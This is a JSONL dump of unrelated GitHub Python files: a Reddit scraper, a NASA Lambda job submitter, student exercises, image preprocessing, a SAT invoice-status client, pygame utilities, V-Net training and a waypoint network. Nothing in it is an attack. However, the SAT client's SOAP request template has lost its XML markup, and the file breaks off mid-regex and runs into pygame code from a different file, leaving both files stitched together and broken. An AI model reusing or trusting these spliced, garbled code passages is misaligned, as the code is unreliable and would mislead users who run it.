= {}\n titles_array=[]\n scrape_url = 'https://oauth.reddit.com/{}/new?limit=100'.format(subreddit)\n reddit_title = requests.get(scrape_url, \n headers=headers)\n \n titles_array.append(reddit_title.json())#['data']['children'][i])#['data']['title'])\n #titles_for_each_subreddit.update({'{}'.format(subreddits):titles_array})\n \n f = open('../'+output_file,'w+')\n for i in range(0,len(titles_array)):\n jsonstr = json.dumps(titles_array[i])\n f.write(jsonstr)\n f.write('\\n')\n f.close()\n\nif __name__ == '__main__':\n main()","repo_name":"knowo1234/Data-Science-Course-McGill","sub_path":"COMP_598/assign_7/src/collect_newest.py","file_name":"collect_newest.py","file_ext":"py","file_size_in_byte":1822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"33217956846","text":"from __future__ import print_function\n\nimport os, sys, re, json, requests, boto3\nfrom datetime import datetime\n\nDATETIME_FORMAT = \"%Y-%m-%dT%H:%M:%S.%fZ\"\n\nprint(\"Loading ISL Lambda function\")\n\nsignal_file_suffix = None\n\nif \"SIGNAL_FILE_SUFFIX\" in os.environ:\n signal_file_suffix = os.environ[\"SIGNAL_FILE_SUFFIX\"]\n\nif \"MOZART_URL\" not in os.environ:\n raise RuntimeError(\"Need to specify MOZART_URL in environment.\")\nMOZART_URL = os.environ[\"MOZART_URL\"]\nJOB_SUBMIT_URL = \"%s/api/v0.1/job/submit\" % MOZART_URL\n\ndef __get_job_type_info(data_file, job_types, default_type, default_release,\n default_queue):\n \"\"\"\n Determine the job type.\n :param data_file: The data file being ingested.\n :param job_types: A mapping of job types to a regex.\n :param default_type: Default job type.\n :param default_release: Default job release version.\n :param: default_queue: Default job queue.\n :return: Function will try to match the given data file to one of \n the types specified in the job type mapping. If no mapping exists \n or a match could not be found, then it will use the default job\n type, release, and queue.\n \"\"\"\n for type in job_types.keys():\n regex = job_types[type]['PATTERN']\n print(\"Checking if {} matches {}\".format(regex, data_file))\n match = re.search(regex, data_file)\n if match:\n release = job_types[type]['RELEASE']\n queue = job_types[type]['QUEUE']\n print(\"Data file '{}' matches job type info: \"\n \"type: {}, release: {}, queue: {}\".format(\n data_file, type, release, queue))\n return type, release, queue\n print(\"Could not match data file '{}' to a given job type: {}. \"\n \"Using default job type info\".format(data_file, job_types.keys()))\n return default_type, default_release, default_queue\n\n\ndef submit_job(job_spec, job_params, queue, tags=[], priority=0):\n \"\"\"Submit job to mozart via REST API.\"\"\"\n\n # setup params\n params = {\n \"queue\": queue,\n \"priority\": priority,\n \"tags\": json.dumps(tags),\n \"type\": job_spec,\n \"params\": json.dumps(job_params),\n \"name\": \"ingest-staged-{}\".format(job_params['data_file']),\n }\n\n # submit job\n print(\"Job params: %s\" % json.dumps(params))\n print(\"Job URL: %s\" % JOB_SUBMIT_URL)\n req = requests.post(JOB_SUBMIT_URL, data=params, verify=False)\n\n print(\"Request code: %s\" % req.status_code)\n print(\"Request text: %s\" % req.text)\n print(\"Request Result: %s\" % req.json())\n\n if req.status_code != 200:\n req.raise_for_status()\n result = req.json()\n \n if \"result\" in result.keys() and \"success\" in result.keys():\n if result[\"success\"] is True:\n job_id = result[\"result\"]\n print(\"submitted job: %s job_id: %s\" % (job_spec, job_id))\n else:\n print(\"job not submitted successfully: %s\" % result)\n raise Exception(\"job not submitted successfully: %s\" % result)\n else:\n raise Exception(\"job not submitted successfully: %s\" % result)\n\n\ndef lambda_handler(event, context):\n '''\n This lambda handler calls submit_job with the job type info\n and product id from the sns message\n '''\n\n print(\"Got event of type: %s\" % type(event))\n print(\"Got event: %s\" % json.dumps(event))\n print(\"Got context: %s\"% context)\n print(\"os.environ: %s\" % os.environ)\n # parse sns message\n message = json.loads(event[\"Records\"][0][\"Sns\"][\"Message\"])\n print(\"Message : %s\" % message)\n # parse s3 event\n s3_info = message['Records'][0]['s3']\n print(\"s3_info in message : %s \" % s3_info)\n # parse signal and dataset files and urls\n bucket = s3_info['bucket']['name']\n #bucket = event['Records'][0]['s3']['bucket']['name']\n trigger_file = s3_info['object']['key']\n print(\"Trigger file: {}\".format(trigger_file))\n if signal_file_suffix:\n ds_file = trigger_file.replace(signal_file_suffix, '')\n else:\n ds_file = trigger_file\n ds_url = \"s3://%s/%s/%s\" % (os.environ['DATASET_S3_ENDPOINT'], bucket,\n ds_file)\n print(\"ds_url = {}\".format(ds_url))\n # Create some metadata\n md = {\n \"tags\": [\"ISL\"],\n \"ISL_urls\": [ds_url],\n \"SNS_record\": event[\"Records\"][0],\n \"S3_event_record\": message['Records'][0],\n \"Lambda_trigger_time\": datetime.utcnow().strftime(DATETIME_FORMAT)\n }\n print(\"Metadata created: {}\".format(json.dumps(md, indent=2)))\n # data file\n id = data_file = os.path.basename(ds_url)\n \n # submit mozart jobs to update ES\n default_job_type = os.environ['JOB_TYPE'] # e.g. \"INGEST_L0A_LR_RAW\"\n default_job_release = os.environ['JOB_RELEASE'] # e.g. \"gman-dev\"\n default_queue = os.environ['JOB_QUEUE']\n job_types = {}\n if 'JOB_TYPES' in os.environ:\n job_types = json.loads(os.environ['JOB_TYPES'])\n\n job_type, job_release, queue = __get_job_type_info(data_file, job_types,\n default_job_type,\n default_job_release,\n default_queue)\n\n job_spec = \"job-%s:%s\" % (job_type, job_release)\n job_params = {\n \"id\": id,\n \"data_url\": ds_url,\n \"data_file\": data_file,\n \"prod_met\": md,\n }\n tags = [\"data-staged\"]\n\n # submit mozart job\n submit_job(job_spec, job_params, queue, tags)\n","repo_name":"nasa/opera-sds-lambdas","sub_path":"lambdas/isl-sns/isl-sns.py","file_name":"isl-sns.py","file_ext":"py","file_size_in_byte":5517,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"81"} +{"seq_id":"41694386166","text":"'''\nReid Dye\nTest 01\nHCS-A\n23 September 2021\n'''\n#%%\nfrom math import *\n\n#%%\ndef prob19():\n x=eval(input('Enter a number: '))\n if x % 2 == 0:\n if x % 4 == 0:\n y='a'\n elif x % 4 != 0:\n y='b'\n elif x % 2 != 0:\n y='c'\n \n print(y)\n\n\n#%%\ndef prob20():\n #import numpy as np\n #output=np.array([i for i in range(101, 1000, 2)])\n #output=sum(output**2)/len(output)\n #print(output)\n output=0\n for i in range(101, 1000, 2):\n output += i**2\n \n print(output/450)\n\n\n# %%\ndef prob21():\n spider=input('Word to replace spider: ')\n water=input('Word to replace water: ')\n spout=input('Word to replace spout: ')\n rain=input('Word to replace rain: ')\n print('The Itsy-Bitsy', spider, 'crawled up the', water, spout+',')\n print('Down came the', rain, 'and washed the', spider, 'out!')\n\n#%%\ndef prob22():\n # all possible permutations of a, b, and c:\n # abc, acb, bca, bac, cba, cab\n # nvm don't need to test all of those because the inputs\n # are given pre-sorted\n a,b,c = eval(input('Enter the three side lengths, from least to greatest, separated by commas: '))\n \n #unneeded\n #a=np.array([a,b,c])\n #a,b,c=np.sort(a)\n\n if a+b<=c:\n raise ValueError('Side Lengths do not form a valid triangle')\n\n if a==b==c:\n triangleType = 'equilateral'\n elif a!=b!=c!=a:\n triangleType = 'scalene'\n else:\n triangleType = 'isosceles'\n \n s=(a+b+c)/2\n\n area=round(sqrt(s*(s-a)*(s-b)*(s-c)), 2)\n\n print(\"The triangle's area is\", area, 'units^2.')\n print('The triangle is a', triangleType, 'triangle.')\n\n\nif __name__=='__main__':\n print('problem 19:')\n prob19()\n print('\\nProblem 20')\n prob20()\n print('\\nProblem 21')\n prob21()\n print('\\nProblem22')\n prob22()","repo_name":"reid23/HCS","sub_path":"Test1/Test01.py","file_name":"Test01.py","file_ext":"py","file_size_in_byte":1829,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"38246505480","text":"import os\nimport glob\nimport argparse\n\nimport numpy as np\n\nfrom multiprocessing import Pool\nfrom PIL import Image, ImageFilter\n\n\ndef parse_args():\n \"\"\"\n Parser for the command line arguments.\n Returns\n -------\n args : Namespace\n The arguments.\n \"\"\"\n parser = argparse.ArgumentParser(description=\"Crop and resize kaggle 2015 image data.\")\n\n parser.add_argument(\"images_folder\",\n type=str,\n help=\"Path to images to extract stats from.\")\n\n args = parser.parse_args()\n return args\n\n\ndef resize_and_pad(im, desired_size):\n \"\"\"\n Resize to desired size while keeping aspect ratio and pad the image so that\n it's a square.\n\n Parameters\n ----------\n im : numpy array\n Image to resize.\n desired_size : int\n Desired size.\n \"\"\"\n # argwhere gives the coordinates of every non-zero point\n true_points = np.argwhere(im)\n # take the smallest points and use them as the top left of your crop\n top_left = true_points.min(axis=0)\n # take the largest points and use them as the bottom right of your crop\n bottom_right = true_points.max(axis=0)\n box = (top_left[1], top_left[0], bottom_right[1], bottom_right[0])\n w = bottom_right[1] - top_left[1]\n h = bottom_right[0] - top_left[0]\n ratio = float(desired_size) / max((w, h))\n new_size = tuple([int(x * ratio) for x in (w, h)])\n # Convert numpy array to PIL image\n im = Image.fromarray(im)\n resized_512 = im.resize(new_size, Image.NEAREST, box)\n new_im = Image.new('RGB', (desired_size, desired_size))\n new_im.paste(resized_512, ((desired_size - new_size[0]) // 2, (desired_size - new_size[1]) // 2))\n return new_im\n\n\ndef preprocess_image(fname):\n \"\"\"\n Crop and resize an image.\n\n Parameters\n ----------\n fname : str\n Path to file.\n \"\"\"\n try:\n with Image.open(fname) as im_pil:\n # build mask\n mask = im_pil.convert('L').filter(ImageFilter.BoxBlur(20)).point(lambda x: 1 if x >= 9 else 0)\n # apply mask to the image\n im = np.array(im_pil) * np.array(mask)[..., None]\n\n # 512 resize, zero padding and save\n im_512 = resize_and_pad(im, 512)\n im_512.save(os.path.join(f\"{os.path.dirname(fname)}_512\", fname.split('/')[-1]))\n\n # Warn if the mask seems to small\n croppedmask = np.array(im_512).sum(2)\n ratio = np.round(croppedmask.flatten().nonzero()[0].size / croppedmask.size, 2)\n if ratio <= 0.66:\n print(f\"Warning: ratio ({ratio}) <= 0.66 threshold\")\n print(fname, \"\\n\")\n\n # 1024 resize, zero padding and save\n im_1024 = resize_and_pad(im, 1024)\n im_1024.save(os.path.join(f\"{os.path.dirname(fname)}_1024\", fname.split('/')[-1]))\n\n except ValueError:\n print(fname)\n pass\n\n\nif __name__ == \"__main__\":\n args = parse_args()\n fnames = glob.glob(f\"{args.images_folder}/*.jpeg\")\n with Pool() as p:\n p.map(preprocess_image, fnames)\n","repo_name":"Museau/Retino","sub_path":"data/get_kaggle2015/crop_resize_kaggle2015_image_data.py","file_name":"crop_resize_kaggle2015_image_data.py","file_ext":"py","file_size_in_byte":3028,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"21463151632","text":"import os\n\npath=\"G:\\\\summer\\\\JAVA\\\\123\"\n\ndef count(filename):\n file=open(filename)\n lines = file.readlines()\n count=len(lines)\n return count\n \ndef get_total(path):\n total=0\n files=os.listdir(path)\n for i in files:\n filename= os.path.join(path,i)\n j=count(filename)\n total+=j\n print(total)\n \n \nif __name__ =='__main__': \n get_total(path)","repo_name":"Tinkle-717/Object_Detection","sub_path":"train_models/Count_quantity.py","file_name":"Count_quantity.py","file_ext":"py","file_size_in_byte":396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"44952567966","text":"#!/usr/bin/env python\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by the\n# Free Software Foundation; either version 3, or (at your option) any later\n# version.\n#\n# This program is distributed in the hope that it will be useful, but\n# WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTIBILITY\n# or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License\n# for more details.\n\nimport base64\nimport datetime\nimport os\nimport re\nimport subprocess\nimport time\nfrom uuid import UUID\nfrom urllib import request\nfrom xml.etree import ElementTree as ET\nfrom dateutil import parser\n\nfrom .db import connect\nfrom .portal_sat import PortalSAT\nfrom settings import (\n log,\n NAME_CER,\n PATH_OPENSSL,\n TRY_COUNT,\n)\n\n\ndef _call(args):\n return subprocess.check_output(args, shell=True).decode()\n\n\ndef get_status_sat(data):\n webservice = 'https://consultaqr.facturaelectronica.sat.gob.mx/consultacfdiservice.svc'\n soap = \"\"\"\n \n \n \n \n \n ?re={emisor_rfc}&rr={receptor_rfc}&tt={total}&id={uuid}\n \n \n \n \"\"\"\n data = soap.format(**data).encode('utf-8')\n headers = {\n 'SOAPAction': '\"http://tempuri.org/IConsultaCFDIService/Consulta\"',\n 'Content-length': str(len(data)),\n 'Content-type': 'text/xml; charset=\"UTF-8\"'\n }\n req = request.Request(url=webservice, data=data, method='POST')\n for k, v in headers.items():\n req.add_header(k, v)\n try:\n with request.urlopen(req, timeout=5) as f:\n response = f.read().decode('utf-8')\n result = re.search(\"(?s)(?<=Estado>).+?(?== self.corner_w:\n self.fill_rect.draw()\n\nclass CornerRect:\n def __init__(self, rect:pygame.Rect, border_size, color):\n # params\n self.display_surface = pygame.display.get_surface()\n self.original = rect\n self.size = border_size\n self.color = color\n self.refresh()\n \n def set_rect(self, rect):\n self.original = rect\n self.refresh()\n \n def set_topleft(self, pos):\n self.original.topleft = pos\n self.refresh()\n \n def set_center(self, pos):\n self.original.center = pos\n self.refresh()\n \n def refresh(self):\n \n # rect, corners\n self.v_rect = self.original.inflate(-self.size*2,0)\n self.h_rect = self.original.inflate(0,-self.size*2)\n self.corners = [\n (self.h_rect.topleft,self.v_rect.topleft,(self.v_rect.left,self.h_rect.top)),\n (self.h_rect.topright,self.v_rect.topright,(self.v_rect.right,self.h_rect.top)),\n (self.h_rect.bottomleft,self.v_rect.bottomleft,(self.v_rect.left,self.h_rect.bottom)),\n (self.h_rect.bottomright,self.v_rect.bottomright,(self.v_rect.right,self.h_rect.bottom))\n ]\n \n # correct\n self.v_rect.h += 1\n self.h_rect.w += 1\n self.center = self.v_rect.center\n \n def draw(self, debug=None):\n pygame.draw.rect(self.display_surface,self.color,self.h_rect)\n pygame.draw.rect(self.display_surface,self.color,self.v_rect)\n for corner in self.corners: pygame.draw.polygon(self.display_surface,self.color,corner)\n if debug: debug.blits += 7\n \nclass Timeit:\n def __init__(self):\n self.start_time = 0\n self.end_time = 0\n self.name = \"Generic Timeit\"\n \n def start(self,name):\n self.name = name\n self.start_time = time.perf_counter()\n return self\n \n def end(self):\n self.end_time = time.perf_counter()\n print(f\"{self.name} elapsed: {self.end_time-self.start_time}\")\n return self\n\n# math\ndef angle_to_vec(angle):\n return vector(math.cos(math.radians(angle)),-math.sin(math.radians(angle)))\n\ndef weighted_choice(sequence,weights):\n weightssum = sum(weights)\n chosen = randint(0,weightssum)\n cweight = 0; i = 0\n for w in weights:\n if inside_range(chosen,cweight,cweight+w): return sequence[i]\n cweight += w; i += 1\n \ndef weighted_choice_combined(sequence_and_weights):\n sequence = [s_a_w[0] for s_a_w in sequence_and_weights]\n weights = [saw[1] for saw in sequence_and_weights]\n weightssum = sum(weights)\n chosen = randint(0,weightssum)\n cweight = 0; i = 0\n for w in weights:\n if inside_range(chosen,cweight,cweight+w): return sequence[i]\n cweight += w; i += 1\n \ndef lerp(start, end, t): return start * (1 - t) + end * t\n \ndef inside_range(number:float|int,rangeStart:float|int,rangeEnd:float|int)->bool:\n return number >= min(rangeStart,rangeEnd) and number <= max(rangeStart,rangeEnd)\n\n# generic \ndef count_pngs(path):\n count = 0\n for f_name, sub_f, files in walk(path):\n for sub_n in sub_f:\n count += count_pngs(path+\"/\"+sub_n)\n for f in files:\n if f.endswith(\"png\"):\n count += 1\n return count \n\ndef list_remove_cond(iterable, condition):\n toremove = [el for el in iterable if condition(el)]\n for e in toremove: iterable.remove(e)\n\n# str\ndef item_from_name(name): return Item({\"name\":name})\ndef parse_items_string(string:str): return string.replace(\"items:\",\"\").split(\",\")\n\n# images\ndef import_folder(path,convert_alpha = True, scale_factor=True):\n images = []\n for _, _, image_names in walk(\"assets/graphics/\"+path):\n for image_name in image_names:\n full_path = \"assets/graphics/\"+join(path,image_name)\n image = pygame.image.load(full_path).convert_alpha() if convert_alpha else pygame.image.load(full_path).convert()\n if scale_factor: image = pygame.transform.scale_by(image,SCALE_FACTOR)\n images.append(image)\n break\n return images\n\ndef import_folder_dict(path,convert_alpha = True, scale_factor=True):\n images = {}\n for _, sub_f, image_names in walk(\"assets/graphics/\"+path):\n for image_name in image_names:\n full_path = \"assets/graphics/\"+join(path,image_name)\n image = pygame.image.load(full_path).convert_alpha() if convert_alpha else pygame.image.load(full_path).convert()\n if scale_factor: image = pygame.transform.scale_by(image,SCALE_FACTOR)\n images[image_name.split(\".\")[0]] = image\n break\n return images\n\ndef import_dict_fx(path, scale=2):\n return {\"_\".join(name.split(\"_\")[0:-1]):pygame.transform.scale_by(image, scale) for name, image in import_folder_dict(path,True,False).items()}\n\ndef load(path,convert_alpha = True,scale_factor=True):\n image = pygame.image.load(\"assets/graphics/\"+path+\".png\").convert_alpha() if convert_alpha else pygame.image.load(\"assets/graphics/\"+path+\".png\").convert()\n if scale_factor: return pygame.transform.scale_by(image,SCALE_FACTOR)\n return image\n\ndef load_scale(path,scale_factor,convert_alpha = True):\n return pygame.transform.scale_by(pygame.image.load(\"assets/graphics/\"+path+\".png\").convert_alpha() if convert_alpha \\\n else pygame.image.load(\"assets/graphics/\"+path+\".png\").convert() ,scale_factor)\n \ndef parse_sprites_ratio(assets, size=UI_INNER_SLOT_SIZE):\n sprites = {}\n for name, img in assets.items():\n w,h = img.get_size()\n if w > h:\n ratio = w/size\n image = pygame.transform.scale(img,(int(size),int(h/ratio)))\n sprites[name] = (image,image.get_rect())\n else:\n ratio = h/size\n image = pygame.transform.scale(img,(int(w/ratio),int(size)))\n sprites[name] = (image,image.get_rect())\n return sprites\n\ndef only_sprites_from_tuple(sprites): return {name:sprite for name, (sprite,_) in sprites.items()}\n\n# sheets\ndef load_sheet(path, size, convert_alpha=False,scale=1): return Spritesheet(load(path,convert_alpha,False),size).frames(scale)\ndef parse_sheets(sheet_dict): return {name:SingleSpritesheet(sheet).frames() for name, sheet in sheet_dict.items()}\n ","repo_name":"Damus666/DinoDungeon","sub_path":"support.py","file_name":"support.py","file_ext":"py","file_size_in_byte":7578,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"71687805705","text":"from pathlib import Path\nfrom multiprocessing import Process, Queue\n\nimport numpy as np\nimport tensorflow as tf\nimport tensorflow.keras as K\n\nimport vnet\nimport data_kits\nfrom config import cfg\nimport utils\n\nparams = {\n \"dstRes\": np.array([1, 1, 1.5], dtype=float),\n \"VolSize\": np.array([128, 128, 64], dtype=int),\n \"normDir\": False # if rotates the volume according to its transformation in the mhd file. Not reccommended.\n}\n\n\ndef load_data():\n dataloader = data_kits.DataManager(cfg.dirTrain, cfg.dirResult, params)\n dataloader.loadTrainingData()\n howManyImages = len(dataloader.sitkImages)\n howManyGT = len(dataloader.sitkGT)\n assert howManyImages == howManyGT\n print(f\"The dataset has shape: data - {howManyImages}. labels - {howManyGT}\")\n numpyImages = dataloader.getNumpyImages()\n numpyGT = dataloader.getNumpyGT()\n for key in numpyImages:\n fg = numpyImages[key][numpyImages[key] > 0]\n numpyImages[key] -= fg.mean()\n numpyImages[key] /= fg.std()\n return numpyImages, numpyGT\n\n\ndef prepare_data_thread(dataQueue, numpyImages, numpyGT, seed=1234):\n nr_iter = cfg.numIterations\n batchsize = cfg.batchSize\n\n keysIMG = list(numpyImages.keys())\n\n nr_iter_dataAug = nr_iter * batchsize\n np.random.seed(seed)\n whichDataList = np.random.randint(len(keysIMG), size=int(nr_iter_dataAug / cfg.nProc))\n whichDataForMatchingList = np.random.randint(len(keysIMG), size=int(nr_iter_dataAug / cfg.nProc))\n\n for whichData, whichDataForMatching in zip(whichDataList, whichDataForMatchingList):\n path = keysIMG[whichData]\n\n currGtKey = path.parent / (path.stem + '_segmentation.mhd')\n currImgKey = path\n\n # data agugumentation through hist matching across different examples...\n ImgKeyMatching = keysIMG[whichDataForMatching]\n\n defImg = numpyImages[currImgKey]\n defLab = numpyGT[currGtKey]\n\n defImg = data_kits.hist_match(defImg, numpyImages[ImgKeyMatching])\n\n if np.random.rand(1)[0] > 0.5: # do not apply deformations always, just sometimes\n defImg, defLab = data_kits.produce_randomly_deformed_image(\n defImg, defLab, cfg.numcontrolpoints, cfg.sigma)\n\n defImg = defImg.astype(np.float32)\n defLab = (defLab > 0.5).astype(np.int32)\n\n # weightData = np.zeros_like(defLab, dtype=float)\n # weightData[defLab == 1] = np.prod(defLab.shape) / np.sum((defLab == 1).astype(dtype=np.float32))\n # weightData[defLab == 0] = np.prod(defLab.shape) / np.sum((defLab == 0).astype(dtype=np.float32))\n\n dataQueue.put(tuple((defImg[..., None], defLab, None)))\n\n\ndef train():\n # Load data and prepare training samples\n numpyImages, numpyGT = load_data()\n dataQueue = Queue(30) # max 50 images in queue\n dataPreparation = [None] * cfg.nProc\n\n # thread creation\n for proc in range(cfg.nProc):\n dataPreparation[proc] = Process(target=prepare_data_thread, args=(dataQueue, numpyImages, numpyGT))\n dataPreparation[proc].daemon = True\n dataPreparation[proc].start()\n\n def data_gen():\n for _ in range(cfg.numIterations * cfg.batchSize):\n defImg, defLab, _ = dataQueue.get()\n yield defImg, defLab\n\n print(\"Load data.\")\n # tensorflow data loader\n h, w, d = params[\"VolSize\"]\n dataset = tf.data.Dataset.from_generator(data_gen, (tf.float32, tf.int32),\n (tf.TensorShape([h, w, d, 1]), tf.TensorShape([h, w, d])))\n dataset = dataset.batch(batch_size=cfg.batchSize)\n\n print(\"Build model.\")\n # build model\n model = vnet.VNet([h, w, d, 1], cfg.batchSize, cfg.ncls)\n learning_rate = cfg.baseLR\n learning_rate = K.optimizers.schedules.ExponentialDecay(learning_rate, cfg.decay_steps, cfg.decay_rate, True)\n optim = K.optimizers.SGD(learning_rate, momentum=0.99)\n criterion = K.losses.SparseCategoricalCrossentropy(from_logits=True)\n\n @tf.function\n def train_step(x, y):\n # Forward\n with tf.GradientTape() as tape:\n prediction = model(x)\n losses = criterion(y, prediction)\n # Backward\n with tf.name_scope(\"Gradients\"):\n gradients = tape.gradient(losses, model.trainable_variables)\n optim.apply_gradients(zip(gradients, model.trainable_variables))\n return losses, prediction\n\n # File writer\n writer, logdir = utils.summary_writer(cfg)\n # Trace graph\n tf.summary.trace_on(graph=True)\n train_step(tf.zeros([1, h, w, d, 1]), tf.zeros([1, h, w, d])) # dry run for tracing graph (step=1)\n tf.summary.trace_export(\"OpGraph\", 0)\n\n print(\"Start training.\")\n save_path = logdir / \"snapshots\"\n total_loss = 0\n dice = None\n for trImg, trLab in dataset:\n loss, pred = train_step(trImg, trLab)\n step = optim.iterations.numpy() # (step start from 2)\n loss_val = loss.numpy()\n\n # Loss moving average\n total_loss = loss_val if step < 5 else \\\n cfg.moving_average * total_loss + (1 - cfg.moving_average) * loss_val\n\n # Logging\n if (step < 500 and step % 10 == 0) or step % cfg.log_interval == 0:\n dice = utils.compute_dice(trLab, pred)\n print(f\"Step: {step}, Loss: {loss_val:.4f}, Dice: {dice:.4f}, \"\n f\"LR: {learning_rate(step).numpy():.2E}\")\n\n # Summary scalars and images\n tf.summary.scalar(\"loss\", total_loss, step=step)\n tf.summary.scalar(\"dice\", dice, step=step)\n tf.summary.image(\"trImg\", trImg[..., d // 2, :], step=step)\n tf.summary.image(\"pred\", pred[..., d // 2, :], step=step)\n\n # Take snapshots\n if step == 2 or step % cfg.snap_shot_interval == 0:\n filepath = utils.snapshot(model, save_path, step)\n print(f\"Model weights saved (Path: {filepath}).\")\n\n # Ending\n filepath = utils.snapshot(model, save_path, optim.iterations.numpy())\n print(f\"Model weights saved ({filepath}).\\nTraining ended.\")\n writer.close()\n\n\nif __name__ == \"__main__\":\n train()\n","repo_name":"Jarvis73/VNet-Tensorflow-V2","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":6086,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"42857445324","text":"import numpy as np\nfrom math import floor\nimport torch\nimport torch.optim as optim\n\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nclass WaypointDistributionNN(nn.Module):\n def __init__(self, x_size, alpha, clamp):\n super(WaypointDistributionNN, self).__init__()\n self.alpha = alpha\n self.clamp = clamp\n \n # c1 = 50\n # k1 = 5\n # s1 = 1\n # p1 = 3\n # \n # c2 = 250\n # k2 = 5\n # s2 = 5\n # p2 = 3\n # \n # c3 = 250\n # k3 = 3\n # s3 = 2\n # p3 = 2\n # self.conv1 = nn.Conv1d(1, c1, k1, stride=s1, padding=p1).double()\n # self.conv2 = nn.Conv1d(c1, c2, k2, stride=s2, padding=p2).double()\n # self.conv3 = nn.Conv1d(c2, c3, k3, stride=s3, padding=p3).double()\n # x_size = floor((x_size + 2*p1 - k1)/s1 + 1)\n # x_size = floor((x_size + 2*p2 - k2)/s2 + 1)\n # x_size = floor((x_size + 2*p3 - k3)/s3 + 1)\n # x_size = x_size*c3\n # self.fc1 = nn.Linear(x_size, x_size).double()\n # self.fc2 = nn.Linear(x_size, floor(x_size/10)).double()\n # self.fc3 = nn.Linear(floor(x_size/10), 4*4+4).double()\n # self.fc4 = nn.Linear(4*4+4, 4*4+4).double()\n # self.fc5 = nn.Linear(4*4+4, 4*4+4).double()\n # self.fc5.weight.data = torch.diag(torch.tensor([1] * 20)).double()\n \n self.fc1 = nn.Linear(x_size, 32, bias=True).double()\n self.fc2 = nn.Linear(32, 32, bias=False).double()\n # self.fc2.weight.data[:,:] = torch.tensor([0.38167919, 0.39101533, -0.44043292, 0.05524485, 1, 1, 1, 1]).view(8,1)\n # print(self.fc2.weight.data.shape)\n self.fc3 = nn.Linear(32,8, bias=True).double()\n # print(self.fc3.weight.data.shape)\n # self.fc1.weight.data = torch.diag(torch.tensor([1]*x_size)).double()\n # self.fc2.weight.data[0:4,0] = torch.tensor([0]*4).double()\n # self.fc2.weight.data[4:,0] = torch.tensor([1]*4).double()\n # self.fc2.weight.data[4:,:] = torch.diag(torch.tensor([1]*4)).double()\n self.fc3.weight.data[:,4:] *= 10\n self.optimizer = optim.Adam(self.parameters(), lr=self.alpha)\n \n def forward(self, x):\n # x = F.relu(self.conv1(x.double()))\n # x = F.relu(self.conv2(x))\n # x = F.relu(self.conv3(x))\n # x = x.view(-1, self.num_flat_features(x))\n # x = F.relu(self.fc1(x))\n # x = F.relu(self.fc2(x))\n # x = F.relu(self.fc3(x))\n # x = self.fc4(x)\n # x[:,4:] = torch.abs(x[:,4:].clone())\n # y = self.fc5(x)\n # y[:,4:] = torch.abs(y[:,4:].clone())\n # x = x[:,0,:]\n # x = F.relu(self.fc1(x))\n # print(x.shape)\n x = F.relu(self.fc1(x))\n x = F.relu(self.fc2(x))\n y = self.fc3(x)\n # y = self.fc2(x)\n return y\n \n def loss(self, y, delta, P):\n total = torch.tensor([0])\n mu = y[:,0:4]\n #mu.register_hook(lambda grad: print(\"gradient:\"+str(grad)))\n dmu = (P - mu).view(y.shape[0], 4, 1)\n dmut = dmu.permute(0,2,1)\n dot = torch.bmm(dmut, dmu).view(y.shape[0])/2\n #print(\"dot product:\")\n print(dot)\n weight_dot = delta*dot\n #print(\"weighted:\")\n #print(weight_dot)\n total = weight_dot.sum()/y.shape[0]\n # print(total)\n return total\n for i in range(y.shape[0]):\n mu = y[i,0:4].clone().view(4,1)\n A = y[i,4:].clone().view(4,4)\n p = P[i,:].clone().view(4,1)\n #S = torch.mm(A, torch.t(A))\n S = torch.diag(torch.tensor([0.001]*4)).double()\n Sinv = torch.inverse(S)\n dmu = p.clone() - mu.clone()\n dot = torch.mm(torch.mm(torch.t(dmu),Sinv),dmu).clone()\n # log = torch.log(torch.det(S))\n log = 0\n total = total.clone() + delta[i]*(log + dot.clone())/2\n #print(total)\n return total/y.shape[0]\n \n def update(self,deltas,P,state):\n self.optimizer.zero_grad()\n \n x = torch.from_numpy(state).double()\n y = self.forward(x)\n mu = y[:,0:4]\n sig = y[:,4:]\n S = torch.diag_embed(torch.mul(sig,sig))\n Sinv = torch.inverse(S)\n P = torch.from_numpy(P)\n dmu = (mu-P).view(x.shape[0], 1, 4)\n # print(Sinv.shape)\n # print(dmu.shape)\n Sinvdmu = torch.bmm(Sinv, dmu.permute(0,2,1))\n # Sinvdmu = dmu.permute(0,2,1)\n dotprod = torch.bmm(dmu, Sinvdmu).view(x.shape[0])\n det = torch.log(torch.det(S))\n detpdotprod = -(dotprod + det)/2\n weighted = detpdotprod*torch.from_numpy(deltas).view(x.shape[0])\n loss = -weighted.sum()/x.shape[0]\n # print(loss)\n # print(detpdotprod)\n loss.backward()\n # print(self.fc2.weight.data)\n # print(loss)\n # dw = self.alpha*torch.mm(torch.mm(y-P, subgrad),x.t())/x.shape[1]\n # dw = torch.mm(torch.mm(y-P, subgrad),x.t())/x.shape[1]\n # print(dw)\n # print(dw)\n # self.fc2.weight.data += dw\n # det.register_hook(lambda grad: print(grad))\n self.fc2.weight.register_hook(lambda grad: grad.clamp_(-self.clamp,self.clamp))\n # self.fc2.weight.register_hook(lambda grad: print(grad))\n self.optimizer.step()\n # print(self.fc2.weight.grad)\n \n return None\n \n def num_flat_features(self, x):\n size = x.size()[1:] # all dimensions except the batch dimension\n num_features = 1\n for s in size:\n num_features *= s\n return num_features\n\n def __call__(self,s):\n x = torch.from_numpy(s).double()\n y = self.forward(x.unsqueeze(0))\n mu = y[:,0:4]\n sig = y[:,4:]\n S = torch.diag_embed(torch.mul(sig,sig))\n # S = torch.from_numpy(np.identity(4))\n return mu.detach().numpy(), 